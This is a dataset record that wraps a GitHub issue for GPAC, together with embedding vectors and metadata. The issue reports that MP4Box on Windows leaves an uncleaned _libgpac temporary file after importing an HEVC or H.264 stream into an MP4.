-0.0018294882029294968, -0.005752068478614092, 0.0029665250331163406, 0.020694855600595474, -0.012062819674611092, 0.0031494738068431616, 0.0132903466001153, 0.031050153076648712, 0.014966393820941448, 0.001896372763440013, 0.006200588308274746, -0.015021475963294506, 0.01460443064570427, 0.0024353833869099617, -0.0016681785928085446, -0.0027973465621471405, 0.011441187001764774, 0.013195921666920185, 0.031396377831697464, 0.00398749765008688, -0.023338761180639267, -0.02094665728509426, -0.00011999869457213208, 0.005464858375489712, 0.02060043066740036, -0.012708058580756187, 0.0030471798963844776, 0.010890373028814793, -0.016382772475481033, -0.002508169272914529, 0.013723129406571388, -0.008474661968648434, -0.005586824379861355, -0.011346761137247086, -0.018145376816391945, 0.008388104848563671, 0.004150774329900742, 0.0012826089514419436, -0.005075354594737291, 0.03861990571022034, -0.008277942426502705, -0.024078426882624626, 0.0004640113329514861, -0.0011272007832303643, 0.01352640986442566, 0.005673380568623543, -0.00451273750513792, -0.002116698306053877, -0.013652309775352478, -0.0097572710365057, -0.002417678479105234, 0.0004224544099997729, 0.008277942426502705, 0.016666047275066376, -0.016666047275066376, -0.009104163385927677, -0.028107235208153725, -0.014321154914796352, -0.02215844765305519, 0.0034425854682922363, -0.01587917096912861, 0.02840624749660492, 0.007856963202357292, -0.030216064304113388, -0.003613731125369668, 0.01655588485300541, 0.000056126438721548766, 0.019845029339194298, 0.0013071988942101598, 0.008852362632751465, -0.023795150220394135, 0.00025548902340233326, -0.02195385843515396, -0.004363230895251036, 0.0036825828719884157, -0.007597294170409441, 0.006090425420552492, -0.034370772540569305, 0.029476400464773178, 0.005964525043964386, 0.0072510684840381145, 0.007569753564894199, 0.0020458793733268976, 0.007711391430348158, -0.021985333412885666, 0.015784746035933495, -0.01352640986442566, 0.012566420249640942, -0.01731128618121147, 0.0035979936365038157, -0.002828821539878845, -0.0016308019403368235, 0.004197986796498299, 0.009355963207781315, -0.026108568534255028, -0.01642998494207859, 0.018129639327526093, 0.010756604373455048, -0.00014987541362643242, -0.01764177531003952, 0.019876504316926003, 0.00017594070232007653, -0.010827423073351383, -0.009033343754708767, 0.02949213795363903, -0.010795948095619678, -0.0010376935824751854, 0.005165845155715942, 0.009001868776977062, 0.0038104502018541098, -0.011716593988239765, -0.004257002845406532, -0.001887520425952971, -0.005858296994119883, 0.0026911182794719934, 0.009505470283329487, 0.003452421398833394, 0.029523612931370735, 0.01778341270983219, 0.0036019280087202787, -0.004182249307632446, -0.0016022776253521442, 0.008333023637533188, 0.009403176605701447, 0.01574540138244629, -0.015674583613872528, 0.0015934252878651023, 0.010410378687083721, -0.03251374512910843, -0.009230063296854496, -0.0024747271090745926, -0.011205123737454414, 0.015611632727086544, 0.011189386248588562, 0.008089092560112476, -0.007274674717336893, 0.005870100110769272, -0.0004534376785159111, -0.005331089254468679, -0.005209123715758324, 0.007117299363017082, -0.009647107683122158, 0.025431854650378227, -0.019404377788305283, 0.007510737981647253, 0.007754669524729252, -0.027761008590459824, -0.014462793245911598, -0.015981465578079224, -0.00343471672385931, -0.002824887167662382, -0.0168391615152359, 0.002325220499187708, 0.0075304098427295685, -0.011299548670649529, -0.012220194563269615, -0.004011103883385658, 0.00487863551825285, 0.0006132720154710114, 0.010575622320175171, 0.007345493882894516, 0.015273275785148144, 0.023008273914456367, -0.02423580177128315, -0.01551720779389143, -0.002268172102048993, -0.012566420249640942, -0.005449120886623859, -0.027855433523654938, 0.0008276958833448589, -0.02632889337837696, 0.003664877964183688, 0.0008980230195447803, -0.0034819291904568672, 0.013660178519785404, 0.015265407040715218, -0.01376247312873602, 0.005925181321799755, -0.002773740328848362, -0.01545425783842802, -0.017248336225748062, -0.0034681588876992464, 0.005138304550200701, -0.025400379672646523, 0.004150774329900742, -0.017688987776637077, 0.04928995296359062, -0.01630408503115177, 0.005626168102025986, 0.0035016012843698263, 0.011260204948484898, 0.021780746057629585, 0.008451055735349655, 0.012975595891475677, 0.0014094928046688437, -0.017248336225748062, -0.008214992471039295, -0.005429449025541544, 0.009828089736402035, -0.006660910788923502, 0.009843827225267887, 0.020568955689668655, 0.03421339765191078, -0.0390605591237545, 0.0016298183472827077, 0.0015029343776404858, 0.005913378205150366, 0.0255734920501709, -0.011905443854629993, 0.01776767522096634, -0.042176589369773865, -0.0036117639392614365, -0.0008842526585794985, -0.00027368555311113596, -0.000835564685985446, -0.01704374887049198, -0.0035212731454521418, 0.00300390156917274, -0.043467067182064056, 0.005295679904520512, 0.016209660097956657, 0.007266805972903967, -0.009938252158463001, -0.01575327105820179, -0.0065546827390789986, -0.005209123715758324, 0.030939990654587746, -0.004477328155189753, 0.009773008525371552, 0.007160577457398176, -0.007278609089553356, 0.009568420238792896, 0.016060153022408485, -0.014234598726034164, 0.005063551478087902, -0.0104339849203825, -0.0027501338627189398, 0.008608430624008179, 0.02645479328930378, 0.008065485395491123, -0.01756308786571026, -0.014974262565374374, -0.008152042515575886, 0.013589359819889069, -0.001577687682583928, -0.019955191761255264, 0.005582890007644892, 0.0026458727661520243, 0.008175648748874664, 0.009041212499141693, -0.0034170118160545826, -0.015588026493787766, 0.014698856510221958, -0.0049179792404174805, 0.006416979245841503, 0.008852362632751465, 0.012196588329970837, -0.011685118079185486, 0.020820757374167442, 0.0009786778828129172, 0.018287014216184616, 0.029098698869347572, 0.005783543456345797, -0.0041232337243855, -0.0024589896202087402, 0.0033796352799981833, 0.0062281289137899876, 0.01737423613667488, -0.0004667162138503045, 0.016744734719395638, 0.023275811225175858, 0.009135638363659382, -0.0016593261389061809, -0.000016290805433527566, 0.000011511145203257911, 0.009953989647328854, 0.010756604373455048, 0.03172686696052551, -0.004740932025015354, 0.0014350663404911757, 0.0038714332040399313, 0.0005872067413292825, 0.0036884844303131104, -0.008954656310379505, -0.011842493899166584, -0.02234729751944542, 0.023873837664723396, -0.013849029317498207, 0.010166446678340435, -0.010614966042339802, -0.0006949104717932642, -0.0023980066180229187, 0.018082424998283386, 0.003188817761838436, -0.031600967049598694, -0.01481688767671585, -0.009576288983225822, 0.014384105801582336, 0.007018940057605505, -0.03116031549870968, 0.020380105823278427, 0.0048471600748598576, 0.0061061629094183445, -0.021292882040143013, 0.00015405569865833968, 0.0023999738041311502, 0.02275647409260273, 0.007856963202357292, -0.009308750741183758, 0.0038104502018541098, -0.006169112864881754, 0.002549480414018035, 0.007105496246367693, -0.011999868787825108, -0.01299133338034153, -0.0010672014905139804, 0.01682342402637005, 0.006826154887676239, -0.013825423084199429, 0.03131769225001335, 0.011016272939741611, 0.027414783835411072, -0.007951389066874981, -0.008726461790502071, -0.019010940566658974, -0.0013308051275089383, -0.0007558934157714248, -0.008726461790502071, -0.01594999060034752, 0.0097572710365057, -0.027839696034789085, 0.002417678479105234, 0.02423580177128315, 0.0336783230304718, -0.02209549769759178, 0.01778341270983219, 0.00750680360943079, -0.010103496722877026, 0.00777827575802803, -0.02464497648179531, 0.030546551570296288, -0.00979661475867033, 0.015037213452160358, -0.011260204948484898, 0.0010632671182975173, 0.016492934897542, -0.0011321187485009432, 0.001357362256385386, -0.0010740866418927908, 0.013888373039662838, -0.0011429383885115385, 0.012975595891475677, 0.01356575358659029, 0.012180850841104984, -0.014391974546015263, -0.014612299390137196, -0.004933716729283333, -0.005850428249686956, -0.004969126079231501, 0.024597764015197754, -0.0014439186779782176, 0.012967727147042751, 0.0149821313098073, 0.00035016011679545045, 0.0000880318257259205, -0.008388104848563671, 0.007754669524729252, -0.03540945053100586, -0.006893039681017399, -0.0025337429251521826, 0.012645107693970203, 0.011740200221538544, 0.01879061572253704, 0.011496268212795258, 0.006609763950109482, -0.010394641198217869, 0.007361231371760368, -0.011331023648381233, -0.009867433458566666, 0.017342761158943176, 0.013675916939973831, 0.008836625143885612, -0.002820952795445919, -0.00681435177102685, -0.000146432823385112, 0.003188817761838436, -0.0009806450689211488, -0.007809750735759735, 0.013038546778261662, -0.008978262543678284, -0.004670112859457731, -0.0008055649814195931, -0.007664178963750601, 0.033080294728279114, 0.0051265014335513115, 0.016807686537504196, -0.0010672014905139804, -0.006621567066758871, 0.013471328653395176, 0.0089231813326478, -0.020490268245339394, -0.02167058363556862, -0.00025376773555763066, 0.002175713889300823, -0.0015875237295404077, -0.019341427832841873, -0.022189922630786896, 0.0019229298923164606, -0.009174982085824013, 0.011370368301868439, -0.0014104763977229595, 0.014006405137479305, -0.0041901180520653725, -0.018538814038038254, 0.00602354109287262, -0.008427449502050877, 0.005740265361964703, -0.013014940544962883, 0.002862263936549425, -0.024204326793551445, -0.024676451459527016, 0.01797226257622242, 0.009481864050030708, -0.023747937753796577, -0.006058950442820787, -0.004406509455293417, 0.004504868760704994, 0.00025893159909173846, -0.021308619529008865, -0.005637971218675375, 0.005043879617005587, -0.012070688419044018, -0.001594408880919218, -0.014801150187849998, 0.014887706376612186, 0.0025258741807192564, -0.03600747510790825, -0.015320489183068275, -0.002641938393935561, 0.004087824374437332, 0.019372902810573578, 0.021355831995606422, 0.010654309764504433, 0.005634036846458912, -0.020364368334412575, -0.007255002856254578, -0.027493471279740334, 0.004646506626158953, 0.00019290772615931928, -0.004536344204097986, 0.027178719639778137, -0.007396640721708536, 0.015469995327293873, -0.006141572259366512, -0.04532409459352493, 0.0008655643323436379, -0.003946186508983374, -0.016681784763932228, -0.0019583392422646284, 0.0024255472235381603, -0.006003868766129017, -0.034024547785520554, 0.001933749415911734, 0.004622900392860174, 0.015265407040715218, 0.018900778144598007, 0.006712058093398809, -0.016791947185993195, 0.027619371190667152, -0.008600561879575253, 0.011370368301868439, 0.019939454272389412, 0.012739533558487892, 0.005071420222520828, -0.0006117966258898377, -0.01857028901576996, 0.013117234222590923, 0.007105496246367693, 0.013030678033828735, -0.012841827236115932, 0.008356629870831966, -0.0007013038266450167, -0.005303548648953438, -0.009851695969700813, -0.009780877269804478, 0.00779007887467742, -0.007939585484564304, 0.013046415522694588, -0.002413744106888771, 0.0006890088552609086, -0.010843160562217236, 0.027084294706583023, 0.0023350564297288656, 0.01831848919391632, 0.027776746079325676, -0.020018141716718674, 0.008364498615264893, 0.002106862375512719, 0.014746068976819515, -0.009072688408195972, -0.010040545836091042, 0.026014141738414764, 0.005342892371118069, 0.026014141738414764, 0.020364368334412575, -0.0032045552507042885, -0.014580824412405491, 0.003906842786818743, -0.004992732312530279, -0.0034386510960757732, -0.010827423073351383, 0.0014783445512875915, 0.0100956279784441, -0.008813018910586834, 0.006491732317954302, 0.00492978235706687, -0.0006776975351385772, -0.009277275763452053, 0.003322586650028825, 0.0008975312230177224, 0.014124436303973198, 0.005071420222520828, -0.019608967006206512, -0.024157114326953888, 0.010119234211742878, 0.005224861204624176, -0.00663337018340826, 0.005811084061861038, 0.015800483524799347, -0.008466793224215508, -0.0034720932599157095, -0.022048283368349075, -0.01858602650463581, -0.009277275763452053, 0.011323154903948307, -0.0005104862502776086, -0.005700921639800072, -0.0011724461801350117, 0.004026841372251511, 0.004717325791716576, -0.0034386510960757732, 0.014258204959332943, 0.01945159211754799, 0.011921181343495846, 0.0018471929943189025, 0.018837828189134598, 0.013298215344548225, 0.012597895227372646, 0.017248336225748062, -0.006900908425450325, 0.015784746035933495, -0.018633238971233368, -0.018287014216184616, -0.009088425897061825, -0.0018334226915612817, 0.02598266676068306, -0.005708790384232998, -0.010339559055864811, 0.004685850348323584, 0.0001702850277069956, 0.0038537285290658474, -0.007310084067285061, -0.009426782839000225, -0.013754604384303093, 0.0009658911149017513, 0.009017606265842915, 0.00318094901740551, 0.017688987776637077, -0.011936918832361698, 0.02739904634654522, 0.016461459919810295, 0.02094665728509426, 0.009300881996750832, 0.0021225998643785715, 0.0020006338600069284, 0.015532945282757282, -0.005858296994119883, -0.011181517504155636, -0.005012404173612595, 0.011732331477105618, 0.002710790140554309, 0.011142173781991005, -0.022048283368349075, 0.01930995285511017, 0.006251735147088766, 0.02072633057832718, -0.003596026450395584, -0.006066819187253714, -0.017736200243234634, 0.0020517809316515923, -0.020883707329630852, -0.00521699246019125, -0.015729663893580437, 0.009552682749927044, -0.016776209697127342, 0.003660943591967225, -0.02080501988530159, 0.008561218157410622, 0.006999267730861902, -0.02167058363556862, -0.005626168102025986, 0.008813018910586834, 0.005484530236572027, 0.018617501482367516, -0.006822220515459776, 0.01879061572253704, 0.01521819457411766, 0.004622900392860174, 0.00011680200259434059, -0.01369952317327261, -0.0013376902788877487, 0.0030943925958126783, 0.028107235208153725, -0.011645774357020855, -0.009906777180731297, 0.01030021533370018, 0.013243134133517742, -0.0056615774519741535, 0.0034583229571580887, 0.010040545836091042, -0.017468662932515144, 0.01316444668918848, 0.007266805972903967, 0.0009826122550293803, -0.02337023615837097, 0.011417580768465996, 0.016650309786200523, -0.013156577944755554, -0.006865499075502157, 0.03978448361158371, -0.012668713927268982, 0.02739904634654522, 0.026769544929265976, 0.004740932025015354, -0.009072688408195972, -0.008875968866050243, 0.010072021745145321, 0.0026871839072555304, 0.005626168102025986, 0.01403788011521101, -0.006790745537728071, -0.006468126084655523, 0.003761270549148321, -0.009639238938689232, 0.027241669595241547, 0.007707457058131695, 0.0004667162138503045, -0.015108032152056694, -0.008616299368441105, -0.006912711542099714, 0.02195385843515396, 0.006535010877996683, -0.013959191739559174, -0.015210325829684734, 0.0013160512316972017, 0.015532945282757282, -0.009773008525371552, -0.01575327105820179, -0.006629435811191797, 0.0055278087966144085, 0.014722462743520737, -0.010764473117887974, 0.01030021533370018, -0.01918405294418335, -0.016382772475481033, 0.025148577988147736, -0.0021521076560020447, -0.009489732794463634, 0.01750013791024685, 0.01602080836892128, -0.005712724756449461, 0.006889105308800936, -0.012133638374507427, 0.0158162210136652, -0.017720462754368782, -0.006287144497036934, -0.00318094901740551, 0.008152042515575886, -0.012054950930178165, 0.014565086923539639, -0.0316639170050621, 0.011724462732672691, 0.0035822559148073196, 0.0029547219164669514, 0.033772747963666916, 0.017814887687563896, -0.0001401624031132087, -0.005641905590891838, 0.0019278478575870395, 0.027446258813142776, -0.013132971711456776, -0.00504781398922205, -0.016508672386407852, -0.01655588485300541, 0.007479262538254261, 0.0323248952627182, -0.011590693145990372, 0.013321821577847004, 0.0034799620043486357, -0.007522541098296642, -0.005374367814511061, 0.009678582660853863, -0.0020035847555845976, 0.004744866397231817, 0.00008335974416695535, -0.007243199739605188, 0.013180184178054333, -0.013235265389084816, -0.005881903227418661, -0.014919181354343891, 0.013573622331023216, -0.013644441030919552, 0.010646441020071507, -0.007467459421604872, 0.025951191782951355, 0.024267276749014854, 0.003910777159035206, -0.032088831067085266, 0.009938252158463001, 0.025730866938829422, -0.000001821189130168932, 0.01231461949646473, 0.008938918821513653, 0.005378302186727524, -0.0016888340469449759, 0.003959957044571638, 0.007479262538254261, 0.016650309786200523, 0.032293420284986496, 0.012212325818836689, 0.010559884831309319, -0.006409110501408577, -0.013998535461723804, -0.013510672375559807, 0.007046480663120747, 0.014958525076508522, 0.005106829572468996, -0.0012590027181431651, -0.0022662049159407616, 0.0029920984525233507, -0.0077822101302444935, 0.03858843073248863, -0.008608430624008179, -0.010677915997803211, -0.01938864029943943, 0.006798614282160997, 0.024928253144025803, -0.011567086912691593, 0.04437984526157379, 0.0020380106288939714, 0.01386476680636406, 0.0074556563049554825, -0.003804548643529415, -0.002673413371667266, -0.00945825781673193, -0.019892241805791855, 0.004957322962582111, 0.002508169272914529, -0.0006432716618292034, -0.008954656310379505, -0.0035783215425908566, -0.007239265367388725, 0.00309635978192091, -0.013494934886693954, 0.015383439138531685, -0.006287144497036934, 0.011142173781991005, -0.028720999136567116, 0.01225166954100132, -0.013109365478157997, 0.005425514653325081, 0.008962525054812431, 0.0002889312745537609, -0.008726461790502071, -0.0016721129650250077, 0.0016721129650250077, -0.003973727114498615, -0.012519207783043385, 0.0031789818312972784, -0.01235396321862936, -0.0031239003874361515, -0.043655917048454285, -0.000033104148315032944, -0.00619271956384182, 0.008576955646276474, 0.01555655151605606, 0.00114490557461977, -0.006723861210048199, -0.01026087161153555, 0.013431984931230545, 0.026564955711364746, -0.010504803620278835, -0.00013032644346822053, -0.008899575099349022, 0.013085759244859219, -0.014651643112301826, 0.020096829161047935, -0.013211659155786037, 0.006200588308274746, 0.015336226671934128, 0.018837828189134598, -0.004418312571942806, 0.03610190004110336, 0.000848351395688951, 0.0032812757417559624, 0.036668453365564346, -0.028736736625432968, 0.014620168134570122, -0.0289570614695549, -0.013620834797620773, 0.030404914170503616, -0.009717926383018494, 0.020018141716718674, -0.008773675188422203, -0.0047094570472836494, -0.00016229331959038973, 0.022111235186457634, 0.012479864060878754, -0.015210325829684734, 0.005929115694016218, 0.02483382821083069, 0.008018272928893566, -0.0104339849203825, 0.008474661968648434, -0.0017960460390895605, 0.015902778133749962, -0.019766341894865036, -0.027886908501386642, 0.01336116623133421, -0.008765806443989277, 0.032151781022548676, -0.0035350434482097626, -0.004784210119396448, -0.013557884842157364, 0.0074123782105743885, 0.00084392522694543, 0.00902547501027584, -0.02362203784286976, 0.0104339849203825, 0.005653708707541227, 0.0010839225724339485, 0.006043212953954935, -0.0009821204002946615, 0.030798353254795074, -0.012110032141208649, 0.004011103883385658, 0.004540278576314449, -0.0026222665328532457, 0.000373274611774832, 0.021450258791446686, 0.015997203066945076, 0.015060819685459137, -0.00688123656436801, 0.010072021745145321, 0.013038546778261662, -0.01576113887131214, -0.0012914612889289856, 0.01127594243735075, -0.008380236104130745, -0.008506136946380138, -0.00019782570598181337, 0.013849029317498207, -0.0016091627767309546, 0.0041035618633031845, 0.026014141738414764, -0.0007450738339684904, 0.016398509964346886, -0.0017330958507955074, 0.006853695958852768, 0.013479197397828102, 0.011205123737454414, -0.01420312374830246, -0.0008321220520883799, 0.021182719618082047, 0.0010170381283387542, 0.06027475371956825, -0.007597294170409441, -0.00042097902041859925, -0.006204522680491209, -0.0149821313098073, -0.01764177531003952, 0.009033343754708767, -0.0015049016801640391, -0.0031730802729725838, -0.011268073692917824, -0.004603228531777859, -0.014974262565374374, -0.0031061957124620676, 0.005673380568623543, -0.006535010877996683, -0.0022603031247854233, -0.00607468793168664, 0.0069638583809137344, 0.0012265440309420228, -0.00289373891428113, 0.0015894909156486392, -0.011755937710404396, -0.012259538285434246, -0.006003868766129017, -0.010670047253370285, 0.0038655316457152367, 0.006928449030965567, 0.006959924008697271, -0.00949760153889656, -0.003592092078179121, 0.024141376838088036, -0.015493601560592651, 0.01433689333498478, -0.02045879326760769, 0.010906110517680645, 0.006279275752604008, 0.007825488224625587, 0.01823980174958706, -0.005516005214303732, -0.01690211147069931, 0.0011999869020655751, -0.0014390007127076387, -0.0039009409956634045, -0.0041901180520653725, -0.016933586448431015, 0.018349964171648026, -0.01545425783842802, 0.03144359216094017, 0.010347427800297737, 0.01764177531003952, -0.009442520327866077, 0.011795281432569027, -0.019215527921915054, 0.01208642590790987, -0.005984196905046701, 0.008750068955123425, 0.009906777180731297, -0.005740265361964703, -0.02201680839061737, -0.00022856307623442262, -0.0048747011460363865, 0.011197254993021488, -0.02033289335668087, -0.012873302213847637, 0.002803248120471835, 0.02955508790910244, 0.014761806465685368, 0.010032677091658115, 0.017248336225748062, 0.01561950147151947, -0.0030727533157914877, -0.01013497170060873, -0.005720593500882387, -0.0012501502642408013, 0.005276008043438196, -0.03556682541966438, -0.00017667839711066335, -0.01386476680636406, 0.004040611907839775, 0.005582890007644892, 0.018129639327526093, 0.014533611945807934, 0.011252336204051971, -0.00686943344771862, 0.0136287035420537, 0.000023744618374621496, 0.013353297486901283, 0.002016371348872781, 0.008907443843781948, -0.012715927325189114, 0.00308849080465734, 0.0010711358627304435, 0.0018983399495482445, -0.002032109070569277, -0.0010160545352846384, 0.020222730934619904, 0.0037947127129882574, 0.016335560008883476, 0.022803686559200287, -0.004540278576314449, 0.012283144518733025, 0.0011035945499315858, -0.017940787598490715, 0.015540814027190208, -0.008970393799245358, -0.016178185120224953, 0.002960623474791646, -0.022772211581468582, -0.010677915997803211, 0.0007681883289478719, 0.025825291872024536, 0.008175648748874664, -0.0085848243907094, -0.005374367814511061, 0.01568245142698288, 0.013156577944755554, 0.011858231388032436, -0.0026911182794719934, 0.003977661486715078, 0.0012619534973055124, 0.008238598704338074, 0.02673806995153427, -0.009143507108092308, -0.011842493899166584, -0.012896908447146416, 0.012212325818836689, 0.012566420249640942, 0.015902778133749962, 0.0076917195692658424, 0.028516409918665886, 0.020915182307362556, 0.0055278087966144085, 0.012975595891475677, 0.01669752225279808, 0.0323248952627182, -0.0014390007127076387, 0.0023645644541829824, 0.0041940524242818356, 0.006235997658222914, 0.01191331259906292, 0.006861564703285694, 0.010371034033596516, 0.00543731776997447, 0.0008232697146013379, -0.011968393810093403, -0.001887520425952971, 0.004658309742808342, -0.02228434756398201, -0.007353362627327442, -0.001938667381182313, 0.0006595010054297745, 0.004725194536149502, 0.0066373045556247234, -0.032545220106840134, -0.004508803132921457, 0.041106436401605606, 0.011283811181783676, 0.030310489237308502, -0.008340892381966114, 0.015769008547067642, -0.004571753554046154, -0.005980262532830238, -0.004048480652272701, -0.009576288983225822, 0.01535196416079998, -0.0006265505217015743, -0.01282608974725008, -0.010150709189474583, 0.008325154893100262, -0.0058228871785104275, -0.013982797972857952, -0.015595895238220692, 0.014722462743520737, -0.003389471210539341, 0.024928253144025803, 0.02477087825536728, 0.011818887665867805, -0.008726461790502071, 0.011944787576794624, 0.029586562886834145, 0.0014832625165581703, -0.009710057638585567, -0.0034622573293745518, -0.0051265014335513115, 0.009977595880627632, -0.0010465459199622273, 0.010552016086876392, 0.0007642539567314088, 0.03251374512910843, -0.0015717861242592335, 0.013557884842157364, -0.00928514450788498, 0.012464126572012901, -0.007502869237214327, -0.0032675054389983416, 0.0017586693866178393, -0.013534278608858585, -0.00006159768963698298, 0.03279701992869377, -0.011795281432569027, 0.008301548659801483, 0.003045212710276246, 0.021104032173752785, 0.018003737553954124 ]
2,320
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
using: ``` MP4Box - GPAC version 1.1.0-DEV-rev620-g9ed3d8d5c-ab-suite (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/local64 --disable-shared --enable-static --static-mp4box Features: GPAC_CONFIG_WIN32 GPAC_64_BITS GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_MAD GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_XVID GPAC_DISABLE_3D ``` on Windows 10 pro 64bit and calling: ``` MP4Box -add "E:\Output\2021-04-07@19_44_24_2410_01.265"#video:fps=25 -tmp "E:\Output" -new "E:\Output\2021-04-07@19_44_24_2410__02.mp4" ``` I get: ``` Track Importing HEVC - Width 640 Height 352 FPS 25000/1000 SAR 1/1 HEVC Import results: 429 samples (433 NALUs) - Slices: 3 I 118 P 308 B - 1 SEI - 3 IDR HEVC Stream uses forward prediction - stream CTS offset: 4 frames HEVC Max NALU size is 17663 - stream could be optimized by setting nal_length=2 Saving E:\Output\2021-04-07@19_44_24_2410__02.mp4: 0.500 secs Interleaving ``` and a '_libgpac_5412_0000021fa3e762b0_0000021fa3e76b30.tmp' file that isn't cleaned up. (Same happens when using .264 files) Attached the the files: [Output.zip](https://github.com/gpac/gpac/files/6273590/Output.zip) in case it matters MP4Box was build using https://github.com/m-ab-s/media-autobuild_suite Cu Selur Ps.: Same happens when I use a tmp-path that isn't the same as the output-path.
Temp files not cleaned up,..
https://api.github.com/repos/gpac/gpac/issues/1732/comments
1
2021-04-07T17:53:09
2021-04-08T08:59:00Z
https://github.com/gpac/gpac/issues/1732
852,654,493
1,732
false
This is a GitHub Issue repo:gpac owner:gpac Title : Temp files not cleaned up,.. Issue date: --- start body --- using: ``` MP4Box - GPAC version 1.1.0-DEV-rev620-g9ed3d8d5c-ab-suite (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/local64 --disable-shared --enable-static --static-mp4box Features: GPAC_CONFIG_WIN32 GPAC_64_BITS GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_MAD GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_XVID GPAC_DISABLE_3D ``` on Windows 10 pro 64bit and calling: ``` MP4Box -add "E:\Output\2021-04-07@19_44_24_2410_01.265"#video:fps=25 -tmp "E:\Output" -new "E:\Output\2021-04-07@19_44_24_2410__02.mp4" ``` I get: ``` Track Importing HEVC - Width 640 Height 352 FPS 25000/1000 SAR 1/1 HEVC Import results: 429 samples (433 NALUs) - Slices: 3 I 118 P 308 B - 1 SEI - 3 IDR HEVC Stream uses forward prediction - stream CTS offset: 4 frames HEVC Max NALU size is 17663 - stream could be optimized by setting nal_length=2 Saving E:\Output\2021-04-07@19_44_24_2410__02.mp4: 0.500 secs Interleaving ``` and a '_libgpac_5412_0000021fa3e762b0_0000021fa3e76b30.tmp' file that isn't cleaned up. (Same happens when using .264 files) Attached the the files: [Output.zip](https://github.com/gpac/gpac/files/6273590/Output.zip) in case it matters MP4Box was build using https://github.com/m-ab-s/media-autobuild_suite Cu Selur Ps.: Same happens when I use a tmp-path that isn't the same as the output-path. --- end body ---
1,761
[ -0.035106681287288666, 0.028209026902914047, -0.014326507225632668, -0.006869905162602663, 0.007159289438277483, 0.02146993950009346, -0.0011724029900506139, 0.03234761953353882, -0.02690877951681614, 0.02313489094376564, -0.02353130839765072, 0.0028185241390019655, -0.02267504669725895, -0.008142403326928616, -0.004067237488925457, 0.016871504485607147, -0.015365119092166424, 0.003591537242755294, 0.015436474233865738, -0.03865857794880867, 0.020756389945745468, -0.016601940616965294, -0.02616351656615734, 0.010536761954426765, -0.009490220807492733, 0.012994546443223953, -0.03456755355000496, 0.016871504485607147, -0.018457170575857162, 0.012217569164931774, -0.0025529249105602503, 0.03697776794433594, 0.005668761674314737, 0.013153113424777985, 0.035804376006126404, 0.014009373262524605, 0.07972736656665802, 0.0690082535147667, 0.015008344314992428, 0.0005921477568335831, -0.027479620650410652, -0.06710545718669891, -0.035550668835639954, 0.0005624165059998631, -0.028557874262332916, 0.006160318851470947, -0.014746708795428276, 0.0057757943868637085, -0.012510918080806732, 0.022453054785728455, 0.005458660889416933, -0.034345559775829315, -0.0017571179196238518, -0.06729573756456375, -0.02323003113269806, -0.02984226495027542, 0.0367874875664711, 0.02468884550035, -0.006505201570689678, 0.04154449328780174, -0.00942679401487112, 0.010647757910192013, -0.003072231076657772, 0.041512779891490936, 0.005843185354024172, -0.019519569352269173, -0.015507829375565052, 0.022865327075123787, -0.025132833048701286, 0.030080115422606468, -0.015380975790321827, -0.012764624319970608, 0.020803960040211678, 0.009648787789046764, 0.022738473489880562, -0.05372241884469986, 0.047411464154720306, 0.006988829933106899, -0.014358220621943474, 0.006069142837077379, -0.06368041038513184, 0.02186635695397854, -0.023911867290735245, 0.02586223930120468, -0.0008567560580559075, -0.00016265481826849282, -0.06088963896036148, -0.06120677292346954, 0.005819400306791067, 0.009014520794153214, 0.005652904976159334, 0.02695634961128235, 0.0247047021985054, -0.03688262775540352, -0.009664644487202168, 0.005938325542956591, -0.016490943729877472, 0.01539683248847723, -0.04106879234313965, -0.02015383541584015, -0.04322529956698418, -0.035709235817193985, -0.023753302171826363, -0.033489301800727844, -0.008935237303376198, 0.004332836717367172, 0.018568167462944984, -0.021945640444755554, 0.032537899911403656, 0.09951650351285934, 0.022009067237377167, 0.0036054118536412716, -0.021136948838829994, 0.0007749950746074319, 0.0076230973936617374, 0.009442650713026524, -0.016855647787451744, -0.01855231076478958, -0.03180849179625511, 0.02378501556813717, 0.011504018679261208, -0.006382312159985304, -0.005843185354024172, 0.025212114676833153, -0.012257210910320282, 0.04522323980927467, -0.005533980205655098, 0.008300970308482647, 0.0033279198687523603, 0.0014825992984697223, -0.06393411755561829, -0.03662892431020737, 0.005938325542956591, -0.0016005332581698895, -0.021454082801938057, -0.04005396366119385, -0.011543660424649715, 0.04129078611731529, -0.0383097305893898, -0.007559670601040125, -0.06634433567523956, -0.05159762501716614, 0.0408150851726532, -0.01350988820195198, 0.005502266809344292, -0.030111828818917274, -0.011844937689602375, -0.005981930997222662, -0.021200375631451607, -0.004503296222537756, -0.0077459863387048244, -0.027749184519052505, 0.0006139507167972624, 0.034440699964761734, 0.03745346888899803, -0.021232089027762413, 0.0029552881605923176, -0.0038333514239639044, -0.023705732077360153, -0.01996355503797531, 0.012804266065359116, -0.03662892431020737, 0.006477452348917723, -0.02560853213071823, -0.024260714650154114, -0.025481678545475006, 0.013414748013019562, 0.05121706426143646, 0.0038888498675078154, 0.005141527391970158, -0.009450579062104225, 0.023452024906873703, 0.006893690209835768, 0.016966644674539566, -0.045984361320734024, -0.022960467264056206, -0.0004591003234963864, 0.04056137800216675, -0.0074566020630300045, -0.02368987537920475, -0.0004895748570561409, 0.01959885284304619, -0.0000930340975173749, -0.003006822196766734, 0.012495061382651329, -0.014905275776982307, 0.014643640257418156, -0.02787603810429573, 0.02137479931116104, -0.04071994498372078, 0.011289953254163265, -0.011646728962659836, 0.039039138704538345, -0.013050044886767864, 0.039039138704538345, -0.008618103340268135, -0.03128522261977196, -0.012843907810747623, -0.014413719065487385, 0.0025985129177570343, 0.0029453777242451906, -0.005855077877640724, -0.008106726221740246, -0.00019523533410392702, -0.042400751262903214, 0.007837162353098392, -0.030206969007849693, 0.03079366497695446, -0.0161262396723032, -0.03450412675738335, -0.0259573794901371, 